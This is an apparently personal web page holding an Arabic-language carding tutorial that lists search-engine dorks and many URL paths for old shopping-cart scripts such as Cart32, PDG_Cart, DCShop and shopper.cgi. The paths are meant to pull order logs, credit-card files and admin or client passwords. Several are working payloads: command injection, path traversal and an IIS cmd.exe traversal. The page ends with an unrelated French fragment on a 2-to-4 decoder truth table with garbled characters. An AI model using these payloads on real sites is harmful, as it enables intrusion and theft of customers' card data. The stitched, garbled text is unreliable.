Home Page | COURS | Photo BEST OF WEB | What's New Page | Contact Page | Favorite Links | Slide Show
The COOLEST Games Ever Made
الطريقة الإحترافية لأخذالفيزات و الإستفادة منها مــــــجاااااانامنقحة 100%

الطريقة الإحترافية لأخذالفيزات و الإستفادة منها مــــــجاااااانامنقحة 100%


اذهب لأي محرك بحث وليكن القوقل مثلا لأنه اقوى محركات البحث العالمية
google
اكتب allinurl: visa.txt

مع تغيير visa.txt إلى عنوان أحد الاكسبلويتات

وهذه مجموعة كبيرة منها

-----------------------------------------------------------
-----------------------------------------
/~gcw/cgi-bin/Count.cgi?df=callcard.dat
/cgi-bin/PDG_Cart/shopper.conf
/cgi-local/PDG_Cart/shopper.conf
/cgi-bin/PDG_Cart/order.log
/PDG_Cart/order.log
/cgi-bin/cart32.exe/cart32clientlist
/cgi-bin/Count.cgi?df=callcard.dat
/cgi/PDG_Cart/order.log
/PDG_Cart/authorizenets.txt
/cgi-bin/PDG_Cart/mc.txt
/PDG/order.txt
/cgi-bin/PDG_cart/card.txt
/PDG_Cart/shopper.conf
/php/mlog.phtml
/php/mylog.phtml
/webcart/carts
/cgi-bin/orders.txt
/WebShop/logs
/cgi-bin/AnyForm2
/cgi-bin/mc.txt
/ccbill/secure/ccbill.log
/cgi-bin/orders/mc.txt
/WebCart/orders.txt
/cgi-bin/orders/cc.txt
/cvv2.txt
/cgi-bin/orderlog.txt
/WebShop/logs
/orderb/shop.mdb
/_private/shopping_cart.mdb
/scripts/iisadmin/tools/mkilog.exe
/cool-logs/mylog.html
/cool-logs/mlog.html
/easylog/easylog.html
/HyperStat/stat_what.log
/mall_log_files/
/scripts/weblog
/super_stats/access_logs
/trafficlog
/wwwlog
/Admin_files/order.log
/bin/orders/orders.txt
/cgi/orders/orders.txt
/cgi-bin/orders/orders.txt
/cgi-sys/orders/orders.txt
/cgi-local/orders/orders.txt
/htbin/orders/orders.txt
/cgibin/orders/orders.txt
/cgis/orders/orders.txt
/scripts/orders/orders.txt
/cgi-win/orders/orders.txt
/bin/pagelog.cgi
/cgi/pagelog.cgi
/cgi-bin/pagelog.cgi
/cgi-sys/pagelog.cgi
/cgi-local/pagelog.cgi
/cgibin/pagelog.cgi
/cgis/pagelog.cgi
/scripts/pagelog.cgi
/cgi-win/pagelog.cgi
/bin/DCShop/auth_data/auth_user_file.txt
/cgi/DCShop/auth_data/auth_user_file.txt
/cgi-bin/DCShop/auth_data/auth_user_file.txt
/cgi-sys/DCShop/auth_data/auth_user_file.txt
/cgi-local/DCShop/auth_data/auth_user_file.txt
/htbin/DCShop/auth_data/auth_user_file.txt
/cgibin/DCShop/auth_data/auth_user_file.txt
/cgis/DCShop/auth_data/auth_user_file.txt
/scripts/DCShop/auth_data/auth_user_file.txt
/cgi-win/DCShop/auth_data/auth_user_file.txt
/bin/DCShop/orders/orders.txt
/cgi/DCShop/orders/orders.txt
/cgi-bin/DCShop/orders/orders.txt
/cgi-sys/DCShop/orders/orders.txt
/cgi-local/DCShop/orders/orders.txt
/htbin/DCShop/orders/orders.txt
/cgibin/DCShop/orders/orders.txt
/cgis/DCShop/orders/orders.txt
/scripts/DCShop/orders/orders.txt
/cgi-win/DCShop/orders/orders.txt
/dc/auth_data/auth_user_file.txt
/dcshop/orders/orders.txt
/dcshop/auth_data/auth_user_file.txt
/dc/orders/orders.txt
/orders/checks.txt
/orders/mountain.cfg
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/webcart/carts
/webcart-lite/orders/import.txt
/webcart/config
/webcart/config/clients.txt
/webcart/orders
/webcart/orders/import.txt
/WebShop/logs/cc.txt
/WebShop/templates/cc.txt
/bin/shop/auth_data/auth_user_file.txt
/cgi/shop/auth_data/auth_user_file.txt
/cgi-bin/shop/auth_data/auth_user_file.txt
/cgi-sys/shop/auth_data/auth_user_file.txt
/cgi-local/shop/auth_data/auth_user_file.txt
/htbin/shop/auth_data/auth_user_file.txt
/cgibin/shop/auth_data/auth_user_file.txt
/cgis/shop/auth_data/auth_user_file.txt
/scripts/shop/auth_data/auth_user_file.txt
/cgi-win/shop/auth_data/auth_user_file.txt
/bin/shop/orders/orders.txt
/cgi/shop/orders/orders.txt
/cgi-bin/shop/orders/orders.txt
/cgi-sys/shop/orders/orders.txt
/cgi-local/shop/orders/orders.txt
/htbin/shop/orders/orders.txt
/cgibin/shop/orders/orders.txt
/cgis/shop/orders/orders.txt
/scripts/shop/orders/orders.txt
/cgi-win/shop/orders/orders.txt
/bin/shop.pl/page=;cat%20shop.pl
/cgi/shop.pl/page=;cat%20shop.pl
/cgi-bin/shop.pl/page=;cat%20shop.pl
/cgi-sys/shop.pl/page=;cat%20shop.pl
/cgi-local/shop.pl/page=;cat%20shop.pl
/htbin/shop.pl/page=;cat%20shop.pl
/cgibin/shop.pl/page=;cat%20shop.pl
/cgis/shop.pl/page=;cat%20shop.pl
/scripts/shop.pl/page=;cat%20shop.pl
/cgi-win/shop.pl/page=;cat%20shop.pl
/bin/cart.pl
/cgi/cart.pl
/cgi-bin/cart.pl
/cgi-sys/cart.pl
/cgi-local/cart.pl
/htbin/cart.pl
/cgibin/cart.pl
/scripts/cart.pl
/cgi-win/cart.pl
/cgis/cart.pl
/bin/cart.pl
/cgi/cart.pl
/cgi-bin/cart.pl
/cgi-sys/cart.pl
/cgi-local/cart.pl
/htbin/cart.pl
/cgibin/cart.pl
/cgis/cart.pl
/scripts/cart.pl
/cgi-win/cart.pl
/bin/cart32.exe
/cgi/cart32.exe
/cgi-bin/cart32.exe
/cgi-sys/cart32.exe
/cgi-local/cart32.exe
/htbin/cart32.exe
/cgibin/cart32.exe
/cgis/cart32.exe
/scripts/cart32.exe
/cgi-win/cart32.exe
/cgi-bin/www-sql;;;
/server%20logfile;;;
/cgi-bin/pdg_cart/order.log
/cgi-bin/shopper.exe?search
/orders/order.log
/orders/import.txt
/orders/checks.txt
/orders/orders.txt
/Orders/order.log
/order/order.log
/WebShop/logs/ck.log
/WebShop/logs/cc.txt
/WebShop/templates/cc.txt
/_private/orders.txt
/_private/orders.htm
/orders/mountain.cfg
/PDG_Cart/shopper.config
/Admin_files/order.log
/mall_log_files/order.log
/PDG_Cart/order.log
/_private/shopping_cart.mdb
/cgi-bin/shopper.cgi
/cgi-bin/shop.cgi
/cgi-bin/perlshop.cgi
/cgi-bin/mall2000.cgi
/log/
/logfile/
/logfiles/
/logger/
/logging/
/logs/
/logs/access_log
/weblog/
/weblogs/
/cgi-bin/loadpage.cgi
/database/
/databases/
/cgi-bin/Web_Store/web_store.cgi
/scripts/cart32.exe
/scripts/c32web.exe
/cgi-bin/shopper?search=action&keywords=dhenzuser%20&template=order.log
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/ezmall2000/mall2000.cgi
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/DCShop/Auth_data/auth_user_file.txt
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.log%00html
/cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt
/cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt
/cgi-bin/cart32/whatever-OUTPUT.txt
/cgi-bin/shopper.cgi?search=action&keywords=root%20&template=order.log
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.log%00html
/cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt;CC
/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=order.log
/derbyteccgi/shopper.cgi?search=action&keywords=moron&template=order.log
/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20../../webcart/system/orders/orders.txt|&CODE=PHOLD;;;
/ccbill/secure/ccbill.log
/cgibin/shopper.cgi?search=action&keywords=moron&template=order.csv
/order13.txt
/cgi-bin/loadpage.cgi?user_id=id&file=data/db.txtcgi-bin/PDG_Cart/order.log
/cgi-bin/shopper.cgi?search=action&keywords=whinhall&template=order.log
/orders/db/zzzbizorders.log.html
/cgi-bin/Shopper.exe?search=action&keywords=psiber%20&template=other\risinglogorder.log
/cgi-bin/shopper.exe?search=action&keywords=psiber&template=order.log
/cgi-bin/shopper.exe?preadd=action&key=9461&template=order.log
/cgi-bin/shopper.exe?preadd=action&key=bajk390ss&template=order.log
/cgi-bin/shop.cgi/page=../../../../etc/hosts
/cgi-bin/cart32/CART32-order.txt
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html
/cgi-bin/cart32.ini
/cgi-bin/cart32.exe/cart32clientlist
/cgi-bin/cart32.exe/error
هذه الطريقة جد مستعمل من طرف القراصنة المحترفين توجد طريقة أخرى تستعمل ضد ضحايى مستهدفين مسبقا
و لاكن هذه حكايا اخرى في موضوع اخر ان شاء الله
في الأنتظار تسوق ممتع في الأنترنات
Cybertox

تريدون توضيح



اود انا اتحدث معكم عن موضوع مهم جدا و مجهول لدى الأغلبية و هوا الفيزا

Shopping Cart للغير

سأقوم بعرض طرق الحصول عليها و بالتدريج وهذا بعد الأعلان

قرقرقرقرقر أشرب
pepsitox
وستصاب بأمراض المعدة
ومع قليل من الحظ ستحصل على السرطان مجانا

نواصل الآن

الكثير يرى مننا هذه الرموز ولا يعرف الى ماذا تعني

cc = credit card

اولا : عبر مواقع ذات نظام
Cart32
ثانيا : عبر
Shopper.cgi


عبر مواقع ذات نظام
Cart32 :
1)ءايجد مواقع توافق نوع النظام المذكور
2) هل هذه المواقع مصابة ؟
3) الثغرات .

لإيجاد مثل تلك المواقع امر سهل على الجميع .. , كل ما عليك هو الذهاب لأي محرك بحث قوي مثل

http://www.google.com/
أو

http://www.altavista.com

و من ثم تقوم بالكتابة في مربع البحث عن

Cart32.exe v3

و الذي يعد اكثر الإصدارات المصابة

و التي سوف تقوم بإحضار جميع مواقع المصابة

ثانيا : هل الموقع مصاب بثغرة ؟

و هذا سهل كل ما عليك انك تطالع في هذا الجدول بالأسفل و تشوف الإصدارات و نسبة اصابتها :


v2.5 مصاب 80 %
v3.0 مصاب 60 %
v3.5 مصاب 30 %
v4.0 غير مصاب " حتى الآن "


ثالثا / The Exploits !

هذا هو الجزء المهم .. كيفية استخدام الثغرات و هو اسهل ما يمكن ..

فعندما نصل الى احد
Cart32 Site مثل :
http://www.unknown.com/cgi-bin/cart32.exe/???r

كيف نحصل على الكروت الشرائية الموجودة داخله ؟
سنقوم بإضافة الإكسبلوتات الى نهاية الموقع مثل :


http://www.unknown.com/cgi-bin/cart...???r-ORDERS.txt
http://www.unknown.com/cgi-bin/cart32/??????-OUTPUT.txt

الحصول على باسورد الأدمن :
http://www.unknown.com/cgi-bin/cart32.ini
الحصول على باسورد العملاء :
http://www.unknown.com/cgi-bin/cart...art32clientlist

رؤية المجلدات داخل الموقع :
http://www.unknown.com/cgi-bin/cart32.exe/error

يوجد الكثير جدا من الثغرات التي يمكن استخدامها " يمكنكم البحث في جوجل"


الطريقة الثانية و هي عبر اختراق
Shopper.cgi و يتكون من :

1.)ءايجد مواقع توافق نوع النظام المذكور
2.) تجريب الإكسبلوتات عليها .
3.) العودة مرة أخرى للحصول على المزيد .

أولا
مثل المرة اللي فاتت .. تروح لمحرك البحث اللي انت تفضله مثل :
http://www.altavista.com/

و تكتب في صندوق البحث
SHOPPER.CGI

مثال :
www.unknown.com/...../SHOPPER.CGI/
تجريب الإكسبلوتات :

تروح تضيف بعدها الإكسبلوتات

" مثل المرة اللي فاتت "
و يوجد الكثير من الإكسبلوتات مثل :
&TEMPLATE=ORDER.LOG
/order/order.log
/WebShop/logs/ck.log
/WebShop/logs/cc.txt
/WebShop/templates/cc.txt
/_private/orders.txt
/_private/orders.htm
/orders/mountain.cfg
/PDG_Cart/shopper.config
/Admin_files/order.log
/mall_log_files/order.log
/PDG_Cart/order.log
/_private/shopping_cart.mdb
/cgi-bin/shopper.cgi

ءالى آخره
لإكسبلوتات التي تجدونها في بداية الموضوع
التي تضاف في نهاية اسم الموقع

أرجو أني أديت الواجب
ولا تنسا أن طبيب الموت هو أستاذ ل500 هكر عربي سنة 2004
وأنا لا أنكر فضله

le decodage

le Dط·آ£ط¢آ©CODEUR
Circuit permettant d'envoyer un signal ط·آ£ط¢آ  une sortie choisie. 

Il dispose de  

1n lignes d'entrط·آ£ط¢آ©es  

2n lignes de sortie

La table de vط·آ£ط¢آ©ritط·آ£ط¢آ© d'un dط·آ£ط¢آ©codeur ``2 vers 4'' (n = 2) est la suivante

e1

e0

s0

s1

s2

s3

0

0

1

0

0

0

0

1

0

1

0

0

1

0

0

0

1

0

1

1

0

0

0

1

kevin metnick

wher is it

simple www.2600.com

 

My URL:
about me


My Addresses:

nitrox_2600@yahoo.fr